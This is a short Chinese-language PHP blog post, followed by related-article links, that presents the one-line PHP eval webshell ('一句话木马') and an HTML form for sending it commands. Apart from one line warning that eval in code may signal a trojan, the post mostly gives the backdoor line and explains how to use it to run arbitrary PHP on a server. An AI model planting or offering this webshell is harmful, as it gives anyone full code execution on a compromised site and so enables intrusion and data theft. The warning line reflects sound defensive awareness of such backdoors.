php eval函数一句话木马代码

yipeiwu_com6年前PHP代码库

eval可以用来执行任何其他php代码,所以对于代码里发现了eval函数一定要小心,可能是木马

就这一句话害死人,这样任何人都可以post任何文件上来,所以要做好防范

<?php @eval($_POST['c']);?>

使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行

<html> 
<body> 
<form action="a.php" method="post"> 
<input type="text" name="c" value="phpinfo();"> 
<input type="submit" value="submit"> 
</form> 
</body> 
</html>

以上所述就是本文的全部内容了,希望大家能够喜欢。

相关文章

php使用PDO获取结果集的方法

本文实例讲述了php使用PDO获取结果集的方法。分享给大家供大家参考,具体如下: fetch()方法 fetch()方法用于获取结果集的下一行,语法如下: mixed PDOStatem...

php封装的数据库函数与用法示例【参考thinkPHP】

本文实例讲述了php封装的数据库函数与用法。分享给大家供大家参考,具体如下: 从Thinkphp里面抽离出来的数据库模块,感觉挺好用 common.php: <?PHP...

PHP接口继承及接口多继承原理与实现方法详解

本文实例讲述了PHP接口继承及接口多继承原理与实现方法。分享给大家供大家参考,具体如下: 在PHP的接口中,接口可以继承接口。虽然PHP类只能继承一个父类(单继承),但是接口和类不同,接...

php define的第二个参数使用方法

看手册说define定义的常量只允许:仅允许标量和 null。标量的类型是 integer, float,string 或者 boolean。 也能够定义常量值的类型为 resource...

PHP登录验证码的实现与使用方法

PHP登录验证码的实现与使用方法

本文实例讲述了PHP登录验证码的实现与使用方法。分享给大家供大家参考,具体如下: 1. 新建code.php验证码生成文件 在此之前必须打开php的GD库,修改php.ini文件的配置,...